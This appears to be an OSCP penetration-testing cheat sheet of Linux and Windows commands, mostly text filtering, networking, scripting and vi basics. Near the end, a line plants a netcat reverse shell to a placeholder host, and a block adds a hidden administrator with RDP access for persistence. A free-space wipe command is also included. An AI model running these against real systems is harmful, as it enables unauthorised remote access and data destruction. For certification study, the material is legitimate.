OSCP
Search…
Linux / WindowsMain commands
Linux main commands in OSCP
Find:
find / -name file 2>/dev/null
ls -ltr - Sort list by last modified. -time -reverse
# Remove recursively and its content. Very dangerous command!
rm -rf ./directory
List what rights the sudo user has.
sudo -l
# This will send all permissions denied outputs to dev/null.
find / -name file 2>/dev/null
Which
Outputs the path of the binary that you are looking for. It searches through the directories that are defined in your $PATH variable.
which bash
# Usually outputs: /bin/bash
Filters
#sort
sort test.txt
#uniq
sort -u test.txt
sort test.txt | uniq
cat filename | sort -u > newFileName
grep
head
tail
tr
sed
sed "1d"
#cut :
64 bytes from 192.168.0.1: icmp_req=1 ttl=255 time=4.86 ms
cut -d" " -f4
-d stands for delimiter. and -f for field.
tr - Translate
Transform all letter into capital letters
tr "[:lower:]" "[:upper:]" < file1 > file2
Remove character
# Remove characters
cat file.txt | tr -d "."
# Remove all dots and replace them with underscore.
cat file.txt | tr "." "_"
awk
awk '/search_pattern/ { action_to_take_on_matches; another_action; }' file_to_parse
awk '/172.16.40.10.81/' error.log
awk '{print}' filename
We can use the -F flag to add a custom delimiter. : awk -F ':' '{print $1}' test.txt
So if you are manipulating some text you might want to start the output with some info about the columns or something like that. To do that we can use the BEGIN-keyword.
awk 'BEGIN {printf "IP-address \tPort\n"} /nop/ {print $3}' test.txt | head
awk 'BEGIN{printf "IP-address \tPort\n"} /nop/ {print $3} END {printf "End of the file\n"}' test.txt | tail
# list cronjobs
crontab -l
# Edit or create new cronjobs
crontab -e
#List all devices
fdisk -l
#Systemctl
systemctl start ssh
systemctl status ssh
systemctl stop ssh
Netstat - Find outgoing and incoming connections
Netstat is a multiplatform tool. So it works on both mac, windows and linux.
$ netstat -antlp
netstat -anpt
iptables -L
# Remove one specific rule
iptables -D INPUT 2
Iteration over a file
This script will iterate over a file and echo out every single line:
#!/bin/bash
for line in $(cat file.txt);do
echo $line
done
Another Way
#!/bin/bash
while read p; do
echo $p
done <file.txt
For Loops
#!/bin/bash
for ((i = 0; i < 10; i++)); do
echo $i
done
Another way to write this is by using the program seq. Seq is pretty much like range() in python. So it can be used like this:
#!/bin/bash
for x in `seq 1 100`; do
echo $x
done
#!/bin/bash
locate 646.c | tail -n 1
This can be done like this:
#!/bin/bash
cat $(locate 646.c | tail -n 1)
VI Operators
VI -
Operators
Operators are commands that do things. Like delete, change or copy.
c - change
ce - change until end of the word.
c$ - change until end of line.
Combining Motions and Operators
Now that you know some motion commands and operator commands. You can start combining them.
dw - delete word
d$ - delete to the end of the line
Password Creation
openssl passwd sam
Windows Commands
cmd:
show hidden files:
dir /A
Print out file content, like cat
type file.txt
grep files
findstr file.txt
show network information
netstat -an
Show network adapter info
ipconfig
Traceroute
tracert
List processes
tasklist
Kill a process
taskkill /PID 1532 /F
Shreds the whole machine
ciper /w:C:\
Mounting - Mapping
wmic logicaldisk get deviceid, volumename, description
Scripts for fun
Make Request:
import requests
req = requests.get("http://site.com")
print req.status_code
print req.text
Read and write to files
file_open = open("readme.txt", "r")
for line in file_open:
print line.strip("\n")
if line.strip("\n") == "rad 4":
print "last line"
echo 'import os; os.system("/bin/nc ip port -e /bin/bash")' > /opt/tmp.py
Add RDP User
Windows
Add RDP user
net user hodor Qwerty123! /add
net localgroup administrators hodor /add
net localgroup "Remote Desktop Users" hodor /add
Enable RDP via Registry
Enable rdp via regsitry
Copy link